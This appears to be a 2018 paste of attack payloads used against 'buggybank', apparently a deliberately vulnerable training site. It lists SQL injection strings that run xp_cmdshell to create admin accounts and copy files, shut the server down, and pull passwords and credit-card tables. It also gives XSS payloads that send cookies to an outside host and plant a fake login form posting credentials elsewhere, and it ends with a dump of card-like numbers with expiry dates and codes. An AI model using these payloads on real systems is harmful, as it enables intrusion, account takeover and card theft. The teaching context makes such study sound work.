
Untitled

a guest
Mar 23rd, 2018
  1. 1/1/08 ' exec master..xp_cmdshell “net user paul noddy /ADD”; --
  2. 1/1/08 ' exec master..xp_cmdshell “net localgroup administrators paul /ADD”; --
  3. 1/1/08 ' exec master..xp_cmdshell "I am really bad at this > c:\sam.txt" -- '
  4. 1/1/08 ' exec master..xp_cmdshell "type c:\sam.txt" --
  5.  
  6. ' union select null," code", " expirydate", " cardnumber", "cardname" from creditcard order by 4--
  7. ' exec master..xp_cmdshell "net localgroup administrators Robot /ADD"; --
  8. ' exec master..xp_cmdshell "type readme.txt"; --
  9. ' exec master..xp_cmdshell "dir C:\inetpub\wwwroot\buggybank\ > sam3.txt"; --
  10. ' exec master..xp_cmdshell "type RobotPoop.txt"; --
  11. \domains\buggybank.cave\wwwroot\
  12. ' exec master..xp_cmdshell "Copy sam3.txt C:\inetpub\wwwroot\buggybank\sam3.txt*"; --
  13. ' exec master..xp_cmdshell "Copy C:\inetpub\wwwroot\buggybank\xfer.asp C:\inetpub\wwwroot\buggybank\robotpoop3.txt*"; --
  14.  
  15. Denial of Service
  16.  
  17. 1/1/08 ' shutdown with nowait; --
  18.  
  19. At the login prompt - data loss ...
  20. x ' or 1=1--
  21. 1 ' or 1=convert (int,(select top 1 cardname from creditcard))--
  22. 1 ' or 1=convert (int,(@@version))--
  23.  
  24. at the url input line..
  25. http://cave.buggybank.org/login.asp?username=' or 1=1--&account=9999
  26. http://cave.buggybank.org/login.asp?username=' having 1=1--&account=9999
  27.  
  28.  
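  29. Error-based SQL injection (not blind: these inputs only yield data when the application echoes database error text to the client; the LIKE probes further down are the boolean-inference kind)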
  30. ' or 1=1--
  31. ' having 1=1--
  32. ' group by userinfo.username having 1=1--
  33. ' group by userinfo.username,userinfo.password having 1=1--
  34.  
  35. 1'; insert into userinfo values('noddy1','noddy1')--
  36. 1'; update userinfo set password='noddy1'--
  37. 1'; delete from userinfo where usermame='noddy1'--
  38.  
  39. o' or username like 'st%'--
  40. o' or username like 'd%'-- (then de, dem, demo)
  41.  
  42. 1' or 1 = convert(int,@@version)--
  43. 1' or 1 = convert(int,@@servername)--
  44. 1' or 1 = convert(int,(db_name()))--
  45. 1' or 1 = convert(int,(user_name()))--
  46.  
  47. 1' or 1=convert(int,(select top 1 password from userinfo))--
  48. 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('me')))--
  49. 1' or 1=convert(int,(select password from userinfo where username=('me')))--
  50. 1' or 1=convert(int,(select top 1 cardnumber from creditcard))--
  51. 1' or 1=convert(int,(select top 1 cardname from creditcard))--
  52.  
  53. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))-- ...then
  54. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
  55. table_name not in ('REFERENTIAL_CONSTRAINTS','CreditCard','dtproperties','sysalternates','sysconstraints')))--
  56.  
  57. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))--
  58. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
  59. table_name not in ('REFERENTIAL_CONSTRAINTS','%20hidden','dtproperties','sysalternates','sysconstraints')))--
  60.  
  61. ' union select null, null, null, null, column_name from information_schema.columns where table_name = '%20hidden' --
  62. ' union select null, null, null, null, name from sysCOLUMNS --
  63. ' union select null from userinfo--
  64. ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
  65. ' union select null, null, null, null, column_name from information_schema.columns where table_name = 'creditcard' --
  66. ' union select null, null, null, null, count (*) from userinfo order by 5 --
  67. ' union select null, table_name, table_type, null, null from information_schema.tables --
  68. ' union select null,null,null,null, password from userinfo--
  69. ' union select null,null,null,null, username from userinfo--
  70. ' union select null,null,null,username, password from userinfo--
  71.  
  72. Cross-site scripting (XSS) attacks
  73.  
  74. <script>alert("VULNERABLE");</script>
  75.  
  76. <script>document.location="http:\\www.malwarebytes.com";</script>
  77.  
  78. <script>alert(document.cookie);</script>
  79.  
  80. <a href=#onclick="document.location='http://www.malwarebytes.com?cookie='+escape(document.cookie)">click for free money</a>
  81.  
  82. <iframe src="http://www.malwarebytes.com height="0" width="0"></iframe>
  83.  
  84. Student is to research adding a form to a page - the solution is below...
  85.  
  86. <script>window.onload=function(){document.getElementByID('hakcme').innerHTML ='<p>Please enter your buggybank username & password to login as admin</p><form method="get" action="http://www.malwarebytes.com">Username:<input type="text" name="username"/><br/>Password:<input type="password" name="passwors"/><br/><p><input type="submit" value="Login"/><p/></form>';};</script>
  87.  
  88.  
  89. Wireshark filters
  90.  
  91. Display
  92. ip.src==10.5.11.1
  93. ip.src!=10.5.11.1
  94. ip.dst==
  95. http&&ip.src==
  96. tcp.port eq 80
  97. tcp contains 01:01:04
  98. snmp||dns||icmp
  99. ip.addr==
  100. decnet
  101. lat
  102.  
  103. capture filters
  104. tcp dst port #
  105. ip src host #
  106. src port range #-#
  107. not icmp
  108. src host # and not dst net #/16
  109. ip proto \icmp
  110. not broadcast
  111.  
  112. The Antikythera mechanism: the world's oldest computer!
  113.  
  114. 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('darren1','buggyboy','joker','demo','a','valus','alex','tony','me')))--
  115.  
  116. ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
  117.  
  118. 1125 4/8/2009 5108136656984175 Darren
  119. 1212 6/6/2014 43212255682521 Darren
  120. 1252 1/3/2014 43226587025400 Darren
  121. 1564 12/16/2009 6011002966567565 Darren
  122. 1568 9/9/2010 34565489474498 Darren
  123. 1657 12/4/2009 372407135137716 Darren
  124. 2364 9/8/2016 43556997816587 Darren
  125. 3456 12/12/2008 4800124627272269 Darren
  126. 3654 9/14/2013 34567789911235 Darren
  127. 4452 5/7/2009 5108132733652677 Darren
  128. 4468 8/18/2016 43221155547782 Darren
  129. 4486 5/5/2009 4673817253379452 Darren
  130. 4564 6/14/2012 43551126878954 Darren
  131. 4695 7/18/2014 34568897554889 Darren
  132. 5448 4/18/2011 43215484568798 Darren
  133. 5448 5/17/2011 43115877795246 Darren
  134. 5644 7/6/2011 34567874466884 Darren
  135. 5648 9/18/2010 6011008517179267 Darren
  136. 6411 3/4/2014 43659996571009 Darren
  137. 6486 7/6/2014 34569987554422 Darren
  138. 6878 9/19/2014 43556887774411 Darren
  139. 7655 2/2/2015 34561125548282 Darren
  140. 7897 8/17/2011 34561158889842 Darren
  141. 7952 5/24/2014 34567789428856 Darren
  142. 8410 9/28/2016 43221598735987 Darren
  143. 8871 4/18/2014 43698774563125 Darren
  144. 9028 4/4/2015 34566332158778 Darren
  145. 9542 4/8/2009 372861489856783 Darren
  146. 9544 3/22/2014 34567165484519 Darren
  147. 9878 4/18/2012 43556987458899 Darren